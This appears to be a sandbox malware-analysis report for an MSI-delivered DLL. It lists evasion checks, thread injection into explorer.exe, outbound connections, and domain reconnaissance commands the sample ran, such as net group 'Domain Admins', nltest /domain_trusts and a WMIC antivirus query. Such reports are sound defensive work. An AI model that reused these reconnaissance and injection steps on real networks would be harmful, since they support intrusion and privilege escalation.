Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D76DC rdtsc

9_2_0B8D76DC

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D4948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

9_2_0B8D4948

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	5_2_0000023CDA4A4D00
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	9_2_01378424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	9_2_01377274

Contains functionality to read device registry values (via SetupAPI)

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8ADCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle,

5_2_00007FFDFA8ADCBC

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5757	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 484	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3320	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\wait.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Found evasive API chain checking for process token information

Source: C:\Windows\Installer\MSI48D4.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\Installer\MSI48D4.tmp	API coverage: 6.4 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 3.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 8080	Thread sleep count: 5757 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep time: -5757000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8088	Thread sleep count: 484 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8088	Thread sleep time: -48400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep count: 3320 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep time: -3320000s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Queries the current domain controller via net

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4B02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00C4B02D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	5_2_00007FFDFA922E90
Source: C:\Windows\explorer.exe	Code function: 9_2_0137A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_0137A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_01372B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_01372B28
Source: C:\Windows\explorer.exe	Code function: 9_2_013804C0 FindFirstFileW,	9_2_013804C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D16F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_0B8D16F4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	9_2_0B8D6604

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8A9A80 GetSystemInfo,

5_2_00007FFDFA8A9A80

Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: rundll32.exe, 00000005.00000002.4125113963.0000023CD8B0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125203904.0000023CD8BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000000.2052116683.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000009.00000003.2944396374.0000000008B70000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.4131028570.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D76DC rdtsc

9_2_0B8D76DC

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000023CDA48CCE0 LdrGetProcedureAddress,

5_2_0000023CDA48CCE0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C1D0A5 IsDebuggerPresent,OutputDebugStringW,

3_2_00C1D0A5

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA968990 GetLastError,IsDebuggerPresent,OutputDebugStringW,

5_2_00007FFDFA968990

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D4948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

9_2_0B8D4948

Contains functionality to dynamically determine API calls

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D89E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_0B8D89E4

Contains functionality to read the PEB

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C42DCC mov ecx, dword ptr fs:[00000030h]		3_2_00C42DCC
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4AD78 mov eax, dword ptr fs:[00000030h]		3_2_00C4AD78

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C12310 GetProcessHeap,

3_2_00C12310

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump

Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C333A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00C333A8
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3353F SetUnhandledExceptionFilter,	3_2_00C3353F
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C32968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00C32968
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C36E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00C36E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97CFD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDFA97CFD8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA946264 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FFDFA946264
Source: C:\Windows\explorer.exe	Code function: 9_2_0B961DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0B961DA0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9753A8 SetUnhandledExceptionFilter,	9_2_0B9753A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.251 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory allocated: C:\Windows\explorer.exe base: 1370000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe

Code function: 5_3_00007DF4877C0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,

5_3_00007DF4877C0100

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread created: C:\Windows\explorer.exe EIP: 1370000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 1370000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe

Memory written: PID: 2580 base: 1370000 value: 4D

Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 7664 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 1370000

Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C152F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,

3_2_00C152F0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8A9AC0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

5_2_00007FFDFA8A9AC0

Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2051955138.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C335A9 cpuid

3_2_00C335A9

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E0C6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E1AC
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E111
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C47132
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00C4E237
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoEx,	3_2_00C323F8
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C4E48A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00C4E5B3
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C476AF
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C4E6B9
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00C4E788
Source: C:\Windows\System32\rundll32.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,	5_2_00007FFDFA99DB78
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA99DEC8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA99DF98
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	5_2_00007FFDFA993D30
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_00007FFDFA99E3D8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA9936A8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00007FFDFA99E5B4

Queries device information via Setup API

Source: C:\Windows\System32\rundll32.exe

5_2_00007FFDFA8ADCBC

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C337D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_00C337D5

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000023CDA4A4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

5_2_0000023CDA4A4D00

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C47B1F GetTimeZoneInformation,

3_2_00C47B1F

Source: C:\Windows\explorer.exe

Code function: 9_2_0137891C RtlGetVersion,GetVersionExW,

9_2_0137891C

Source: C:\Windows\System32\nltest.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: WMIC.exe, 00000022.00000003.3205750718.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206909823.00000168E2AB4000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203140018.00000168E3181000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204986672.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204882904.00000168E2AB1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3202974361.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3205850824.0000002202B07000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000003.3202974361.00000168E2A63000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203050115.00000168E2A89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206837378.00000168E2A9B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204986672.00000168E2A9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows Defender\MsMpeng.exe
